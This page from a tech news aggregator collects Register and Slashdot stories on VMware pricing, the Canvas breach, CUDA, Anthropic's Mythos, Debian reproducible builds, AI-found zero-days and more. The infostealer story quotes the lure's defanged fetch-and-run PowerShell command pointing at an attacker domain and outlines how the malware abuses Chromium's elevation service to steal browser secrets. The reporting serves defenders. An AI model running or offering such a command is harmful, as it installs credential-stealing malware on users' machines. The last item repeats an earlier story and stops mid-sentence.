news aggregator

Quit VMware and you’ll emerge with more complex and less capable infrastructure

TheRegister - Mon, 2026-05-11 23:59
Organizations that decide to reduce their VMware footprints, or quit Virtzilla entirely, will emerge with more complex and less capable infrastructure. That’s the view of Paul Delory, a research vice president with analyst firm Gartner, who yesterday told the company’s IT Infrastructure, Operations & Cloud Strategies Conference in Sydney that there is no technical reason for VMware users to adopt a rival hypervisor, and that no vendor offers a one-for-one replacement for the virtualization pioneer’s flagship Cloud Foundation (VCF) suite. But Delory said Broadcom’s licensing policies, which see it only sell VCF, mean VMware users’ licensing bills typically rise by 300 to 400 percent. Broadcom argues that the full-stack private clouds VCF makes it possible to build are so efficient that VCF quickly pays for itself. The analyst told the conference he thinks those contemplating a move off VMware will do better if they instead focus on application modernization. But he said Broadcom’s price changes, and the prospect the company might hike prices again in future, mean many VMware users will look elsewhere. Those who do, he warned, will end up with more complex infrastructure for two reasons. One is that few organizations will be able to quit VMware entirely, as they run applications with dependencies that aren’t easy or economical to unwind. Reducing or eliminating a VMware rig therefore means adopting multiple replacements, which creates more infrastructure to manage and therefore extra complexity. The other is that no rival hypervisor can match the efficiency or VM density possible when using VMware’s products, so moving means acquiring more hardware. Delory said the best alternatives to VMware are the public cloud, or HCI vendors – these days that acronym denotes both hyperconverged infrastructure and hybrid cloud infrastructure. The analyst warned that HCI vendors, with the exception of Nutanix, have weak migration tools that will leave users needing to create bespoke migration automations using “Ansible and a Rube Goldberg machine.” Public clouds, he said, will welcome customers who move 1,000 or more VMs with free migration services. He recommended against considering OpenStack, which he said remains “too big, too complex, and has too many moving parts for the typical IT shop to handle effectively.” Delory also warned VMware users that migration projects are significant engineering undertakings that require extensive assessment of every application in a fleet to determine its best destination, and the work required to get it there. He reminded VMware users that not every workload is certified to run under non-VMware hypervisors, and that some vendors now offer cloud-native versions of their wares and therefore offer an easier on-ramp to containerised applications. Delory advised exploring those options, and not making architectural decisions that mean you can’t consider moving off VMware. “VMware is betting that you can’t move off and they can jack the price way up,” he said. “That may be a good bet. But don’t make it easy.” The analyst finished his talk by predicting most users will minimize their VMware footprints, rather than eliminating them, and restated Gartner’s prediction that 35 percent of workloads currently running under VMware will operate on a different platform by 2028. ®
Categories: Linux fréttir

Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline

TheRegister - Mon, 2026-05-11 23:16
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and Advanced Placement testing for many. As of Saturday, the parent company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters defaced about 330 Canvas school login portals, also exploiting the same Free-for-Teacher vulnerability, and that caused the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools including Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Categories: Linux fréttir

Digg Tries Again, This Time As an AI News Aggregator

Slashdot - Mon, 2026-05-11 23:00
Digg is relaunching again, this time as an AI-focused news aggregator rather than the Reddit-style community site it recently abandoned. TechCrunch reports: On Friday evening, the founder previewed a link to the newly redesigned Digg, which now looks nothing like a Reddit clone and more like the news aggregator it once was. This time around, the site is focused on ranking news -- specifically, AI news to start. In an email to beta testers, the company said the site's goal is to "track the most influential voices in a space" and to surface the news that's actually worth "paying attention to." AI is the area it's testing this idea with, but if successful, Digg will expand to include other topics. The email warned that the site was still raw and "buggy," and was designed more to give users a first look than to serve as its public debut. On the current homepage, Digg showcases four main stories at the top: the most viewed story, a story seeing rising discussion, the fastest-climbing story, and one "In case you missed it" headline. Below that is a ranked list of top stories for the day, complete with engagement metrics like views, comments, likes, and saves. But the twist is that these metrics aren't the ones generated on Digg itself. Instead, Digg is ingesting content from X in real-time to determine what's being discussed, while also performing sentiment analysis, clustering, and signal detection to determine what matters most. [...] The site also ranks the top 1,000 people involved in AI, as well as the top companies and the top politicians focused on AI issues.

Read more of this story at Slashdot.

Categories: Linux fréttir

CUDA Proves Nvidia Is a Software Company

Slashdot - Mon, 2026-05-11 22:00
Nvidia's real AI moat isn't "a piece of hardware," writes Wired's Sheon Han. It's CUDA: a mature, deeply optimized software ecosystem that keeps machine-learning workloads tied to Nvidia GPUs. An anonymous reader quotes a report from Wired: What sounds like a chemical compound banned by the FDA may be the one true moat in AI. CUDA technically stands for Compute Unified Device Architecture, but much like laser or scuba, no one bothers to expand the acronym; we just say "KOO-duh." So what is this all-important treasure good for? If forced to give a one-word answer: parallelization. Here's a simple example. Let's say we task a machine with filling out a 9x9 multiplication table. Using a computer with a single core, all 81 operations are executed dutifully one by one. But a GPU with nine cores can assign tasks so that each core takes a different column -- one from 1x1 to 1x9, another from 2x1 to 2x9, and so on -- for a ninefold speed gain. Modern GPUs can be even cleverer. For example, if programmed to recognize commutativity -- 7x9 = 9x7 -- they can avoid duplicate work, reducing 81 operations to 45, nearly halving the workload. When a single training run costs a hundred million dollars, every optimization counts. Nvidia's GPUs were originally built to render graphics for video games. In the early 2000s, a Stanford PhD student named Ian Buck, who first got into GPUs as a gamer, realized their architecture could be repurposed for general high-performance computing. He created a programming language called Brook, was hired by Nvidia, and, with John Nickolls, led the development of CUDA. If AI ushers in the age of a permanent white-collar underclass and autonomous weapons, just know that it would all be because someone somewhere playing Doom thought a demon's scrotum should jiggle at 60 frames per second. CUDA is not a programming language in itself but a "platform." I use that weasel word because, not unlike how The New York Times is a newspaper that's also a gaming company, CUDA has, over the years, become a nested bundle of software libraries for AI. Each function shaves nanoseconds off single mathematical operations -- added up, they make GPUs, in industry parlance, go brrr. A modern graphics card is not just a circuit board crammed with chips and memory and fans. It's an elaborate confection of cache hierarchies and specialized units called "tensor cores" and "streaming multiprocessors." In that sense, what chip companies sell is like a professional kitchen, and more cores are akin to more grilling stations. But even a kitchen with 30 grilling stations won't run any faster without a capable head chef deftly assigning tasks -- as CUDA does for GPU cores. To extend the metaphor, hand-tuned CUDA libraries optimized for one matrix operation are the equivalent of kitchen tools designed for a single job and nothing more -- a cherry pitter, a shrimp deveiner -- which are indulgences for home cooks but not if you have 10,000 shrimp guts to yank out. Which brings us back to DeepSeek. Its engineers went below this already deep layer of abstraction to work directly in PTX, a kind of assembly language for Nvidia GPUs. Let's say the task is peeling garlic. An unoptimized GPU would go: "Peel the skin with your fingernails." CUDA can instruct: "Smash the clove with the flat of a knife." PTX lets you dictate every sub-instruction: "Lift the blade 2.35 inches above the cutting board, make it parallel to the clove's equator, and strike downward with your palm at a force of 36.2 newtons." "You can begin to see why CUDA is so valuable to Nvidia -- and so hard for anyone else to touch," writes Han. "Tuning GPU performance is a gnarly problem. You can't just conscript some tender-footed undergrad on Market Street, hand them a Claude Max plan, and expect them to hack GPU kernels. Writing at this level is a grindsome enterprise -- unless you're a cracker-jack programmer at DeepSeek..." Han goes on to argue that rivals like AMD and Intel offer competitive specs on paper, but their software stacks have struggled with bugs, compatibility issues, and weak adoption. As a result, Nvidia has built an Apple-like moat around AI computing, leaving the industry dependent on its expensive hardware.

Read more of this story at Slashdot.

Categories: Linux fréttir

Anthropic's Bug-Hunting Mythos Was Greatest Marketing Stunt Ever, Says cURL Creator

Slashdot - Mon, 2026-05-11 21:00
cURL creator Daniel Stenberg says Anthropic's hyped Mythos bug-hunting model found only one confirmed low-severity vulnerability in cURL, plus a few non-security bugs, after he expected a much longer list. He argues Mythos may be useful, but not meaningfully beyond other modern AI code-analysis tools. "My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing," Stenberg said a blog post. "I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos." He went on to call Mythos "an amazingly successful marketing stunt for sure." The Register reports: Stenberg explained in a Monday blog post that he was promised access to Anthropic's Mythos model - sort of - through the AI biz's Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl's codebase and later sent him a report. "It's not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway," Stenberg explained. "Getting the tool to generate a first proper scan and analysis would be great, whoever did it." That scan, which analyzed curl's git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were "confirmed security vulnerabilities" in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report "felt like nothing," and that feeling was further validated by a review of Mythos' findings. "Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability," Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. "The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June," the cURL meister noted. "The flaw is not going to make anyone grasp for breath."

Read more of this story at Slashdot.

Categories: Linux fréttir

Rodent-obsessed developer creates Ratty to bring 3D graphics to the command line

TheRegister - Mon, 2026-05-11 20:54
When you think of a terminal emulator, you imagine a command line interface filled with ASCII text and a prompt. However, one developer has reimagined the experience to include inline 3D objects and image support. Dubbed Ratty by its creator Orhun Parmaksiz for its 3D spinning rat cursor, the terminal window itself is a 3D canvas that supports sprites and 3D models, can render 3D drawings in real time, and even includes its own graphics protocol. “Terminal emulators are a big part of our daily lives as developers but yet we are not making enough innovations in that space,” Parmaksiz told The Register in an email. “With Ratty I hope to inspire others to experiment with terminals and push the limits of what they can do.” Parmaksiz wrote in his blog post introducing Ratty that he accomplished the whole thing using his own Rust terminal interface library, Ratatui, along with the Bevy game engine, also built with Rust. The aforementioned Ratty Graphics Protocol was created in order to register 3D assets and place them in an anchored terminal cell space. “Ratty separates terminal emulation from presentation: one side handles PTY I/O and terminal parsing, while the other turns the result into a GPU-rendered 2D or 3D scene,” Parmaksiz explained. “This allows for a lot of flexibility in how the terminal output is displayed (e.g. you can warp the whole damn thing).” Ratatui ends up serving as the terminal rendering layer, Parmaksiz explained, taking whatever the terminal state is, rebuilding it in its own buffer, and rendering said buffer onto a texture that is then rendered via Bevy. Given its design, be forewarned if you try to install and run Ratty: It’s going to eat up a lot of memory since it’s running a game engine. “I know, sacrificing 300 MB of RAM just to run a terminal emulator is a lot,” Parmaksiz said. “But everything comes with a cost, especially the spinning rat cursor.” Building the fourth temple Parmaksiz’s desire to push the limits of terminal emulators past their logical limits didn’t come from nowhere - he actually got inspiration from a source that some grey-hairs in the tech community might have been reminded of at the very beginning of this story: TempleOS. For those unfamiliar with TempleOS, it’s an operating system that was developed by the late Terry Davis, a schizophrenic, and arguably genius, software developer who believed he was building the OS at the command of God to serve as a digital Jewish Third Temple. Using TempleOS is an exercise in frustration given its confusing interface, not to mention deliberate constraints (Davis believed its 640x480 desktop, 16-color display, single-voice audio and other features were part of God’s commandment), but it also included a fascinating capability not seen in other OSes: first-class, insertable sprites on the command line. “I was blown away by the creativity and passion behind it,” Parmaksiz told us of TempleOS, noting that 3D command line sprites in the OS were his inspiration for Ratty. “I wanted to see how adopting that to a modern-day terminal emulator would look like and experimented with a couple of other things while I was at it. I'm super happy with the result!” Parmaksiz told us that a number of people instantly caught on to the TempleOS inspiration, and that the feedback has been overwhelmingly positive. That said, he also admitted that most people who’ve used it have been scratching their heads over an actual use case. “I think this will also clarify itself if we give it more time,” Parmaksiz said in his email. “I mean... I really would like to see a full-fledged CAD program in the terminal built with Ratty Graphical Protocol at some point!” Whether that’ll ever happen remains to be seen - this is purely a fun project for now and Parmaksiz isn’t even sure it’s in his personal time budget to continue to maintain. “I'm just testing the waters for now, but the reception has been amazing so far. I would be happy to continue development if people start using Ratty and start developing cool things with it,” Parmaksiz said, noting that the code is open and he’d be thrilled if others contributed. Parmaksiz has developed a Ratatui widget that enables devs to build applications that run in Ratty, like a temple runner knockoff. “My ultimate goal with Ratty is to explore the possibilities of what a terminal can be and inspire new ideas and projects in the terminal space,” Parmaksiz wrote in his blog post. “I believe these kinds of experiments are where creativity is born and I hope to spark some ideas for the future of terminals.” ®
Categories: Linux fréttir

Microsoft researchers find AI models and agents can't handle long-running tasks

TheRegister - Mon, 2026-05-11 20:50
Companies exploring automated workflows would be well advised to keep their AI agents on a short leash. Microsoft researchers have found that even the priciest frontier models introduce errors in long workflows, the very thing for which AI software has been pitched. Anthropic, for example, says, "Claude Cowork handles tasks autonomously. Give it a goal and Claude works on your computer, local files, and applications to return a finished deliverable." Redmond promotes similar usage, touting Microsoft 365 Copilot's ability to "Tackle complex, multistep research across your work data and the web." The Windows maker's scientists aren't so sure about that. Philippe Laban, Tobias Schnabel, and Jennifer Neville from Microsoft Research set out to study what happens when large language models (LLMs) are asked to complete multistep tasks. They recently published their findings in a preprint paper with a spoiler title: "LLMs Corrupt Your Documents When You Delegate." To test how LLMs handle long-running knowledge work tasks, the researchers devised a benchmark called DELEGATE-52. It simulates multistep workflows across 52 professional domains, such as writing code, crystallography, and music notation. It is a more taxing test than sorting a spreadsheet, a task that should be table stakes for any aspiring workflow agent. In the accounting domain, for example, the challenge involves a seed document that represents the accounting ledger of Hack Club, a nonprofit organization. The model is asked to split the seed document into separate category-based files and then to merge these chronologically back into a single file. "Our findings show that current LLMs introduce substantial errors when editing work documents, with frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, and GPT 5.4) losing on average 25 percent of document content over 20 delegated interactions, and an average degradation across all models of 50 percent," the authors report. The authors found that LLMs did better on programming tasks and worse on natural language tasks. To be considered "ready" for a given work domain, the researchers set the bar at 98 percent or higher after 20 interactions. They only found one domain qualified: Python programming. For every other domain, the authors found LLMs fell short of "ready." "A per-domain breakdown of end-of-simulation scores reveals that models are not ready for delegated workflows in the vast majority of domains, with models severely corrupting documents (at least -20 percent degradation) in 80 percent of our simulated conditions," the authors state. The study found that "catastrophic corruption," meaning a benchmark score of 80 percent or less, occurred in more than 80 percent of model/domain combinations. The best performing model, Google Gemini 3.1 Pro, was ready for only 11 of 52 domains. In weaker models, degradation took the form of content deletion; in frontier models, it took the form of content corruption. And when errors occurred, they tended to happen all at once, resulting in the loss of 10 to 30 points in a single round-trip interaction, rather than accumulating over the entire test run. "The stronger models (Gemini 3.1 Pro, Claude 4.6, GPT 5.4) aren’t avoiding small errors better, they delay critical failures to later rounds and experience them in fewer interactions," the researchers observe in their paper. The Microsoft authors went on to test how agents – LLMs given access to file reading, writing, and code execution through a basic harness – handle the DELEGATE-52 benchmark. Tools in this instance didn't help. "The four tested models perform worse when operated agentically with tools than without, incurring an average additional degradation of 6 percent by the end of simulation," the authors observe, in reference to GPT-5.4, 5.2, 5.1, and 4.1. Given that task delegation is the whole point of an AI agent – if you wanted to do it yourself, you wouldn't have tried to automate the task – this casts a bit of a shadow on the AI hype train. An intern who corrupted a quarter of a document over a long workflow would be shown the door. Yet companies are showing AI the money: according to Deloitte, organizations are spending an average of 36 percent of their digital budgets on AI automation. That might make sense if arming LLMs with the tools to function as full-blown agents meant less document degradation. But that's not the case. The authors found "using a basic agentic harness does not improve the performance of LLMs" with regard to the DELEGATE-52 test and that LLM performance after two interactions doesn't reflect how models perform after 20, which they argue underscores the need for long-horizon evaluation. "Current LLMs are ready for delegated workflows in some domains such as Python coding, but not in other less common domains," the authors conclude. "In general, users still need to closely monitor LLM systems as they operate and complete tasks on their behalf." Yet they also note that LLMs have been getting better, pointing to the performance of OpenAI's GPT model family, which has seen its benchmark performance increase over 16 months from 14.7 percent to 71.5 percent. ®
Categories: Linux fréttir

Cookie thieves caught stealing dev secrets via fake Claude Code installers

TheRegister - Mon, 2026-05-11 20:21
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer for an attacker-controlled command. In this case, the command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attacks also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native AEB helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper formats a pipe to exfiltrate sensitive data using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but it falls back to the legacy interface on the Elevation Service alongside the legacy IElevator if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for the several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because "behavioral rule sets that look at the native PE in isolation will see nothing actionable,” as they wrote. “Detection has to land at the COM call and at the PowerShell layer.” ®
Categories: Linux fréttir

GM Cutting Hundreds of Salaried IT Workers As It Trims Costs, Evaluates Needs

Slashdot - Mon, 2026-05-11 20:00
GM is laying off about 500 to 600 salaried IT workers, mainly in Austin, Texas, and Warren, Michigan, as it restructures its technology organization and trims costs. "GM is transforming its Information Technology organization to better position the company for the future. As part of that work, we have made the difficult decision to eliminate certain roles globally. We are grateful for the contributions of the employees affected and are committed to supporting them through this transition," the automaker said in an emailed statement. CNBC reports: GM reported employing about 68,000 salaried workers globally as of the end of last year, including 47,000 white-collar employees in the U.S. Despite Monday's cuts, GM still is still hiring IT workers. The company has 82 open IT positions that include positions working in artificial intelligence, motorsports and autonomous vehicles, according to the automaker's careers website.

Read more of this story at Slashdot.

Categories: Linux fréttir

iPhone-Android RCS Conversations Are End-To-End Encrypted In iOS 26.5

Slashdot - Mon, 2026-05-11 19:00
Apple says end-to-end encryption for RCS messages between iPhone and Android is now available in iOS 26.5, though the feature is still considered beta and depends on carrier support on both sides. MacRumors reports: Apple says that it worked with Google to lead a cross-industry effort to add E2EE to RCS. iOS users will need iOS 26.5, while Android users will need the latest version of Google Messages. End-to-end encryption is on by default, and there is a toggle for it in the Messages section of the Settings app. Encrypted messages are denoted with a small lock symbol. On iPhones not running iOS 26.5, RCS messages between iPhone and Android users do not have E2EE, but the new update will put Android to iPhone conversations on par with iPhone to iPhone conversations that are encrypted through iMessage. Along with Google, Apple worked with the GSM Association to implement E2EE for RCS messages. E2EE is part of the RCS Universal Profile 3.0, published with Apple's help and built on the Messaging Layer Security protocol. RCS Universal Profile 3.0 also includes editing and deleting messages, cross-platform Tapback support, and replying to specific messages inline during cross-platform conversations.

Read more of this story at Slashdot.

Categories: Linux fréttir

OpenAI can't have incompetent AI consultants ruining the market, so bought its own

TheRegister - Mon, 2026-05-11 18:33
OpenAI can’t have inexperienced consultants derailing the AI hype train, so it’s launching a consultancy of its own to help enterprises find the value in its models necessary to justify the spending, revenue that Sam Altman's company desperately needs to cover its infrastructure costs. To support the endeavor, OpenAI has agreed to acquire UK-based AI consulting firm Tomoro. The terms of the acquisition weren’t disclosed. Tomoro will form the backbone of the OpenAI Deployment Company, which will operate as a standalone business unit tasked with helping enterprises find the value that they've been missing from the AI flag bearer's models. But don’t worry, McKinsey. OpenAI’s new Forward Deployed Engineers (FDEs) are only there to make sure you don’t sour enterprises on AI by dragging them down an expensive rabbit hole that fails to deliver value. The new company is backed by the usual assortment of AI-crazed venture capitalists and private equity firms, but several consultancies, including Capgemini, Bain, and yep, McKinsey, have agreed to plow billions into the venture. OpenAI says that its AI consultancy will launch with more than $4 billion of investments. Presumably, these consultancies will call in OpenAI’s FDEs when they need help proving AI can boost productivity and/or cut payroll. According to OpenAI, a typical enterprise engagement will look a bit like this: OpenAI’s FDEs will launch a diagnostic to determine where AI can create the most value, then carry out a select set of PoCs. If successful, the FDEs will then design, build, and deploy production systems that tie into enterprises' existing customer data and tools. The experience gained from these integrations will no doubt be used to improve OpenAI’s models and services. The acquisition of Tomoro would bring approximately 150 FDEs and deployment specialists into OpenAI’s new consultancy unit. The deal is expected to close in the coming months, subject to regulatory approvals. Whether enterprises should hitch their saddle to OpenAI’s success at a time when inference providers and model devs are already jacking prices in an effort to get their infrastructure costs under control is another matter entirely. As we reported last week, with the launch of GPT-5.5, OpenAI once again increased its API pricing. For one million tokens, GPT-5.5 is priced at $5 (input), $0.50 (cached input), and $30 (output), double that of its predecessor. But don’t worry, OpenAI says the model might be more frugal about how it uses those tokens. ®
Categories: Linux fréttir

Students Boo Commencement Speaker After She Calls AI the 'Next Industrial Revolution'

Slashdot - Mon, 2026-05-11 18:00
An anonymous reader quotes a report from 404 Media: Speaking to graduates of University of Central Florida's College of Arts and Humanities and Nicholson School of Communication and Media on May 8, commencement speaker Gloria Caulfield, vice president of strategic alliances at Tavistock Group, told graduating humanities students that AI is the "next industrial revolution," and was met with thousands of booing graduates. "And let's face it, change can be daunting. The rise of artificial intelligence is the next industrial revolution," Caulfield said. At that point, murmurs rippled through the crowd. Caulfield paused, and the crowd erupted into boos. "Oh, what happened?" Caulfield said, turning around with her hands out. "Okay, I struck a chord. May I finish?" Someone in the crowd yelled, "AI SUCKS!" Her speech begins around the hour and 15 minute mark in the UCF livestream. [...] Before the industrial revolution comment, Caulfield praised Jeff Bezos for his passion and use of Amazon as a "stepping stone" to his real dream: spaceflight. Rattled after the crowd's reaction, she continued her speech: "Only a few years ago, AI was not a factor in our lives." The crowd cheered. "Okay. We've got a bipolar topic here I see," Caulfield said. "And now AI capabilities are in the palm of our hands." The crowd booed again. "I love it, passion, let's go," she said. "AI is beginning to challenge all major sectors to find their highest and best use," she continued. "Okay, I don't want any giggles when I say this. We have been through this before, these industrial revolutions. In my graduation era, we were faced with the launch of the internet." She goes on to talk about how cellphones used to be the size of briefcases. "At that time we had no idea how any of these technologies would impact the world and our lives. [...] These were some of the same trepidations and concerns we are now facing. But ultimately it was a game changer for global economic development and the proliferation of new businesses that never existed like Apple and Google and Meta and so many others, and not to mention countless job opportunities. So being an optimist here, AI alongside human intelligence has the potential to help us solve some of humanity's greatest problems. Many of you in this graduating class will play a role in making this happen."

Read more of this story at Slashdot.

Categories: Linux fréttir

Debian 14 cracks down on unreproducible packages

TheRegister - Mon, 2026-05-11 17:04
About halfway through the Debian 14 “Forky” development process, its release team announced a new goal: deterministic package compilation. The Debian project’s latest Bits from the release team newsletter has a goal which may not sound very big, but will mean significant extra effort in a direction that could prove to be a valuable extra security measure. "Aided by the efforts of the Reproducible Builds project, we’ve decided it’s time to say that Debian must ship reproducible packages," wrote ReleaseTeam member Paul Gevers. "Since yesterday, we have enabled our migration software to block migration of new packages that can’t be reproduced or existing packages (in testing) that regress in reproducibility." Of the two links in that paragraph, the independent Reproducible Builds project does not, in this vulture’s humble opinion, explain what it’s all about very clearly. We feel that Debian’s own Reproducible Builds wiki page does it better: It should be possible to reproduce, byte for byte, every build of every package in Debian. The Wikipedia article also has a good clear explanation, and introduces a helpful synonym: deterministic compilation. In other words, if you use the same version of the same compiler with the same options, then every time you compile an identical set of source files, the process ought to result in an identical set of binary files. This is starting to become an industry trend – for instance, when we reported on the release of FreeBSD 15 late last year, we noted that it too now promises reproducible builds. Reproducible builds in Debian have been a long time coming: The Register first reported on Debian’s efforts in this direction way back in 2015. It’s not an easy task, but it’s a useful security measure. The idea is to ensure that binaries have not been tampered with – for instance, modified to insert malware. It permits an additional verification step, so that users or automated tools can check whether the binaries they (or their OS package manager) downloaded are byte-identical to the ones they can compile themselves. Without this, you just have to trust the distributor who compiled your OS – as Ubuntu “self-appointed benevolent dictator for life” Mark Shuttleworth pointed out in 2012. (The Internet Archive has a copy of his long-gone blog post.) We also mentioned reproducible builds when we looked at NixOS Raccoon back in 2022, and tried to explain why it was a desirable thing. (Around the same time, Rocky Linux CEO Greg Kurtzer also told us that it was part of the plan for that project, too.) NixOS is already a little further down the reproducibility trail, and as we reported on its add-on Flox deployment tool in 2024, it also aims to deliver reproducible deployments. This won’t directly make Debian safer. It’s already one of the safer and more stable Linux distros there are, anyway. Instead, it’s about infrastructure changes that make it easier to check the supply chain, and to make it possible to write software that can check and verify that what you’re getting really is what you thought that you were getting. If it all works, you won’t be able to tell any difference – but auditing tools will. Debian 13 came out last August, and so Debian 14 is expected in about a year – although it does not have to stick to a rigorous fixed schedule like the commercially-backed projects. ®
Categories: Linux fréttir

Google Says Hackers Used AI To Create Zero Day Security Flaw For the First Time

Slashdot - Mon, 2026-05-11 17:00
Google says it has seen the first evidence of cybercriminals using AI to create a zero-day vulnerability. "Google reported its findings to the unnamed firm affected by the vulnerability before releasing its report," reports Politico. "The company then issued a patch to fix the issue." From the report: Google Threat Intelligence Group researchers detailed the development in a report released Monday. Zero-day exploits are considered the most serious type of security flaw because they are not detected by security companies and have no known fixes. The report noted that this was the first time Google had seen evidence of AI being used to develop these vulnerabilities -- marking a major change in the cybersecurity landscape, as it suggests newer AI models could be used to create major exploits, not just find them. Google concluded that Anthropic's Claude Mythos model -- which has already found thousands of vulnerabilities across every major operating system and web browser -- was most likely not used to create the zero-day exploit. [...] The Google Threat Intelligence Group report also details efforts by Russia-linked hacking groups to use AI models to target Ukrainian networks with malware, while North Korean government hacking group APT45 used AI technologies to refine and scale up its cyber methods. John Hultquist, chief analyst at Google Threat Intelligence Group, said the findings made clear that the race to use AI to find network vulnerabilities has "already begun." "For every zero-day we can trace back to AI, there are probably many more out there," Hultquist said. "Threat actors are using AI to boost the speed, scale, and sophistication of their attacks."

Read more of this story at Slashdot.

Categories: Linux fréttir

Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator

TheRegister - Mon, 2026-05-11 16:30
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. “The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync 